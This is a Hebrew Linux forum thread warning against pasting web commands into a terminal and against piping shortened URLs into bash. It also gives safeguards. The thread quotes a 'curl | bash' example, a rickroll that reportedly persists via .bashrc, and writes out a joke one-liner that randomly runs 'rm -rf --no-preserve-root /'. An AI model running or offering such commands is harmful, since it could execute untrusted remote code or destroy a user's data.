Whatsup - לינוקס, תוכנה חופשית וקוד פתוח בעברית

טיפים - לא להדביק פקודות מהרשת אל הטרמינל

elcuco - 08/05/2017 - 14:14
נושא ההודעה: לא להדביק פקודות מהרשת אל הטרמינל
באתרים רבים יש פקודות רבות. הרבה פעמים רואים משהו ... אבל יש Java Script שבעת לחיצה משנים את התוכן של ה-HTML כך שבפועל מועתק קוד שונה מזה שאורים על המסך.

עוד דוגמא, אפשר לראות כאן, נא לא להדביק את זה אל המסוף שלכם:
קוד:

curl -L http://bit.ly/10hA8iC | bash

Anonymous - 08/05/2017 - 14:28
נושא ההודעה: Re: לא להדביק פקודות מהרשת אל הטרמינל
elcuco :
באתרים רבים יש פקודות רבות. הרבה פעמים רואים משהו ... אבל יש Java Script שבעת לחיצה משנים את התוכן של ה-HTML כך שבפועל מועתק קוד שונה מזה שאורים על המסך.

עוד דוגמא, אפשר לראות כאן, נא לא להדביק את זה אל המסוף שלכם:
קוד:

curl -L http://bit.ly/10hA8iC | bash


כן, צריך להבין מה אתה עושה ומה אתה קורא.
Anonymous - 08/05/2017 - 14:29
נושא ההודעה:
היא עוד דוגמה
https://security.stackexchange.com/questions/113627/what-is-the-risk-of-copy-and-pasting-linux-commands-from-a-website-how-can-some

אבל עם noscript מופעל זה לא יכול לקרות. Smile
Anonymous - 08/05/2017 - 18:10
נושא ההודעה:
לא הבנתי מה הבעיה.
צריך לדעת מה אתה מריץ ולא סתם להוריד סקריפט ולהריץ.
המון המון תוכנות משתמשות בשיטה הזו.
לדוגמה -
שף - https://docs.chef.io/install_omnibus.html
נוד - https://nodejs.org/en/download/package-manager/#debian-and-ubuntu-based-linux-distributions
בלאקארץ (שם בכלל יש בדיקת חתימה על הסקריפט) - https://blackarch.org/downloads.html#install-repo


הבעיה היא בלינק המקוצר ואיך הגעת אליו. ולא בהתקנה דרך curl | sh
Anonymous - 09/05/2017 - 09:59
נושא ההודעה:
מבולבלים? גם אני... מכל השרשור הזה לא ברור ממה בדיוק צריך להזהר ואיך להמנע מסקריפטים כאלו. אשמח לשורה תחתונה פרקטית
mksoft - 09/05/2017 - 10:03
נושא ההודעה:
בד"כ אני מוריד את הסקריפט, ללא ביצוע הפניה ל-shell, ואז עובר על תוכנו לחפש דברים חשודים.

אם נראה לי בסדר, מריץ אותו.
elcuco - 10/05/2017 - 09:08
נושא ההודעה:
Anonymous :
מבולבלים? גם אני... מכל השרשור הזה לא ברור ממה בדיוק צריך להזהר ואיך להמנע מסקריפטים כאלו. אשמח לשורה תחתונה פרקטית


תריץ את הפקודות הללו במסוף שלך. הן לא יצרו נזק. אבל לפחות תלמד.
Anonymous - 10/05/2017 - 09:24
נושא ההודעה:
ציטוט:
תריץ את הפקודות הללו במסוף שלך. הן לא יצרו נזק. אבל לפחות תלמד.

ציטוט:
נא לא להדביק את זה אל המסוף שלכם:

אם לא הייתי מספיק מבולבל אז עכשיו.. העלאת הנושא על ידך חשובה ובעלת ערך אבל לא כולם מנוסים ומבינים מספיק בכדי לזהות פקודה בעיתית. האם מדובר על פקודות שיש בהן כתובת http://...? איך יודעים אם יש בפקודה JS? ואיך מבצעים את זה:
ציטוט:
בד"כ אני מוריד את הסקריפט, ללא ביצוע הפניה ל-shell, ואז עובר על תוכנו לחפש דברים חשודים.

תודה
elcuco - 10/05/2017 - 10:01
נושא ההודעה:
Anonymous :
ציטוט:
תריץ את הפקודות הללו במסוף שלך. הן לא יצרו נזק. אבל לפחות תלמד.

ציטוט:
נא לא להדביק את זה אל המסוף שלכם:

אם לא הייתי מספיק מבולבל אז עכשיו.. העלאת הנושא על ידך חשובה ובעלת ערך אבל לא כולם מנוסים ומבינים מספיק בכדי לזהות פקודה בעיתית. האם מדובר על פקודות שיש בהן כתובת http://...? איך יודעים אם יש בפקודה JS? ואיך מבצעים את זה:
ציטוט:
בד"כ אני מוריד את הסקריפט, ללא ביצוע הפניה ל-shell, ואז עובר על תוכנו לחפש דברים חשודים.

תודה


זאת בדיחה. תודה שהרסת לי. יא קקה. בכל זאת תריץ - יהיה צחוקים.

ברצינות :
הבעייה היא לא JavaScript. אלא שאתה מאפשר למישהו חיצוני להריץ קוד bash על המחשב שלך. ואין לך שליטה עליו. איך מובטח לך שאין באמצע פקודה שמוחקת לך את הדיסק? או במקביל מתקינה לך משהו חדש? או שאין באג בגרסה הספציפית שאתה מוריד?

מאיר אמר שהוא מוריד את הקובץ, בודק אותו ואז מריץ ידנית.
Anonymous - 10/05/2017 - 12:09
נושא ההודעה:
אז הבעיה שאני לוקח אתכם יותר מדי ברצינות...! Wink
הרצתי ומופיע רקדן ברזולוציה נמוכה - מקווה שבפעם הבאה אדע להמנע מאיזה רקדן מסוכן
תודה
elcuco - 10/05/2017 - 14:44
נושא ההודעה:
Anonymous :
אז הבעיה שאני לוקח אתכם יותר מדי ברצינות...! Wink
הרצתי ומופיע רקדן ברזולוציה נמוכה - מקווה שבפעם הבאה אדע להמנע מאיזה רקדן מסוכן
תודה


תפעיל רמקולים יא קקה. הרסת חצי מהבדיחה.

אבל עדיין ההמלצה תקפה - אל תדביק דברים באופן אקראי מהרשת, גם מאתרים מוכרים. הם תמיד html של הדף שלך - ולכן יכולות לשנות את ה-dom.

זה לא קרה לך, אבל גם עדיין לא דרסו אותי במעבר חצייה, אז אין טעם להסתכל מהצדדים או לחכות לאור ירוק.
Anonymous - 10/05/2017 - 15:31
נושא ההודעה:
מסתבר שגם להרוס בדיחות צריך לדעת... הרמקול מופעל רק שמשום מה אין לי רמקול כשמריצים מהטרמינל. את העיקר נראה שהבנתי ומקווה להזהר בפעם הבאה
Anonymous - 10/05/2017 - 15:45
נושא ההודעה:
יאללה נעלה שלב
קוד:
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf —no-preserve-root / || echo *Click*

Anonymous - 10/05/2017 - 15:45
נושא ההודעה:
חברים, קצת דרך ארץ לא תזיק!

לשואל המבולבל, ואחרים שאולי יגיעו לשרשור הזה:

יש פה ניסיון להזהיר בפני שתי שיטות עבודה מסוכנות שעלולות להוביל לביצוע פקודות מזיקות על המחשב שלכם:

1. הדבקת טקסט ישירות מדף אינטרנט למסוף.
אתר זדוני יכול להציג טקסט אחד, אבל להעתיק טקסט שונה לגמרי, ואם בסופו יש סימן n\, הפקודה תתבצע לפני שתספיקו לשים לב שזו בכלל לא הפקודה שהעתקתם.

שתי דרכים למנוע את המצב הן:
1.1 להדביק קודם את השורה בעורך טקסט, לבחון אותה, ואם בטוחים שזה מה שרוצים להריץ, להדביק במסוף.
1.2 להקליד את הפקודה בעצמכם. זו הדרך הטובה ביותר לוודא שאתם גם מבינים מה אתם עושים, ולא סתם מעתיקים בצורה עיוורת בתקווה שזה יפתור את הבעיה שלה חיפשתם פתרון.


2. הרצה של סקריפטים שהורדו מהרשת בלי לבדוק מה באמת ירד, ואפילו מאיזה קישור.
בדוגמה עם curl מבקשים להוריד מ-URL מקוצר (שמחביא את הכתובת האמתית) וישר להריץ את מה שירד ע"י הזרמתו (דרך צינור | ) ל-shell.


כדי להימנע מצרות כאלה, יש לפעול במשנה זהירות:
2.1 להוריד רק מאתרים שאתם בוטחים בהם, ואם קיבלתם מסיבה כלשהי URL מקוצר, לבדוק טוב טוב לאן הוא מוביל באמת.
2.2 אם יש לכם את הידע, עדיף לעבור על הסקריפט שהורדתם. אם אין, תצטרכו לסמוך על מי ששם את הסקריפט, וגם שלא פרצו לו לאתר ולא השחילו משהו.

ולבסוף, רוב החברים באתר עם הידע, מבינים די מהר שצירפת קישור עם סריפט ריק רול.
שגם מוסיף עצמו ל-bashrc. כדי לרוץ אוטומטית.

ומי שאין לא מספיק ידע, לא יסתכן לבדוק.

אז ממש לא צריך לצעוק "קקה" על מי ששאל שאלות על זה או הסתכן ובדק שהסקריפט עובד!!!

אם כי אני מודה שלא ציפיתי שריק רולינג יגיע גם ל-bash...

--לב
Anonymous - 11/05/2017 - 19:21
נושא ההודעה:
מה שכן, אני מעריך את אלה שיודעים לכתוב פקודות שיודעות לא לגרום נזק, אבל בצורה אלגנטית. לדוגמה:
https://lists.debian.org/debian-devel-announce/2017/04/msg00000.html
עם שיפור הניסוח בתגובה:
https://lists.debian.org/debian-devel/2017/04/msg00000.html
ניקולו - 23/10/2018 - 00:19
נושא ההודעה: Re: לא להדביק פקודות מהרשת אל הטרמינל
Anonymous :

http://bit.ly/10hA8iC


אני מתפלא שמשתמש שיודע לכתוב סקריפטים מתוחכמים ל-shell נותן לפונקציה את השם "?has".
כל הזמנים הם GMT + 2 שעות